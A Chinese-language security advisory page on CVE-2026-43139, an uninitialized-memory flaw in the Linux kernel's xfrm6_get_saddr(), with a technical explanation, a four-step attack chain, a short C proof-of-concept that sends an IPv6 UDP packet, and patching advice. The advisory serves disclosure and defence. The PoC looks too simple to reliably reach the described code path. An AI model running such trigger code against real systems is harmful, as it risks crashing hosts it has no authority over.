CVE-2026-43139 CVSS 8.6 高危

CVE-2026-43139 Linux内核xfrm6未初始化内存漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43139

漏洞类型

内存未初始化

CVSS评分

8.6 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核网络子系统中的xfrm6模块存在高危漏洞。在`xfrm6_get_saddr()`函数处理IPv6源地址获取时，未校验`ipv6_dev_get_saddr()`的返回值。当地址查找失败时，函数仍返回成功，导致调用方使用了未初始化的内存地址。这引发了KMSAN警告，并可能导致系统不稳定、崩溃或潜在的敏感信息泄露风险。

技术细节

该漏洞位于Linux内核的IPv6协议栈实现中，具体涉及`net/ipv6/xfrm.c`文件的`xfrm6_get_saddr()`函数。该函数负责为IPsec转换选择合适的源IPv6地址。正常流程下，应调用`ipv6_dev_get_saddr()`获取地址，并检查其返回值（成功为0，失败为负数）。然而，在受影响版本中，代码直接使用了`saddr`指针指向的结果而未进行检查。当`ipv6_dev_get_saddr()`因配置错误或路由问题无法找到合适地址并返回`-EADDRNOTAVAIL`时，`saddr->in6`并未被赋值，处于未初始化状态。随后的调用链（如`xfrm_tmpl_resolve_one` -> `xfrm_state_find`）会读取该未初始化的内存区域。虽然这主要触发KMSAN（内核内存消毒剂）告警，但在实际运行中，使用垃圾数据作为网络地址可能导致路由逻辑混乱、内核崩溃（DoS），或在极少数情况下泄露内核堆栈信息。

攻击链分析

STEP 1

侦察

攻击者确认目标系统运行存在漏洞的Linux内核版本，且启用了IPv6和IPsec相关功能。

STEP 2

准备

攻击者配置或诱导网络流量，使其经过xfrm6处理路径，特别是需要源地址选择但可能失败的场景。

STEP 3

触发

向目标发送特制的IPv6数据包或等待系统处理特定网络流量，触发xfrm6_get_saddr()函数执行错误路径。

STEP 4

利用

内核尝试使用未初始化的内存地址，可能导致系统崩溃（DoS）或通过KMSAN检测到信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-43139
 * This code attempts to trigger the uninitialized variable usage
 * by sending UDP traffic over IPv6 that requires IPsec lookup.
 * Compile: gcc -o poc_cve2026_43139 poc_cve2026_43139.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>

int main() {
    int sockfd;
    struct sockaddr_in6 addr;
    const char *message = "Triggering xfrm6 path";

    // Create a IPv6 UDP socket
    sockfd = socket(AF_INET6, SOCK_DGRAM, 0);
    if (sockfd < 0) {
        perror("socket creation failed");
        exit(EXIT_FAILURE);
    }

    memset(&addr, 0, sizeof(addr));
    addr.sin6_family = AF_INET6;
    addr.sin6_port = htons(80);
    
    // Use a link-local or specific address that might trigger saddr selection issues
    // depending on the system's routing and IPsec policy configuration.
    if (inet_pton(AF_INET6, "ff02::1", &addr.sin6_addr) <= 0) {
        perror("inet_pton failed");
        close(sockfd);
        exit(EXIT_FAILURE);
    }

    // Sending data triggers the xfrm_lookup_route -> xfrm_lookup_with_ifid
    // -> xfrm_resolve_and_create_bundle -> xfrm_tmpl_resolve_one -> xfrm6_get_saddr path.
    if (sendto(sockfd, message, strlen(message), 0, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("sendto failed");
    } else {
        printf("Packet sent. Check kernel logs for KMSAN warnings or crashes.\n");
    }

    close(sockfd);
    return 0;
}

影响范围

Linux Kernel (Versions prior to commits 1799d8a, 3dcd166, 4f28141, 6535867, 719918f)

防御指南

临时缓解措施

建议立即更新Linux内核到修复了该漏洞的版本。在无法立即重启更新的情况下，可以通过禁用IPv6 IPsec策略（xfrm）或限制网络访问来临时规避风险，直到完成修补。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表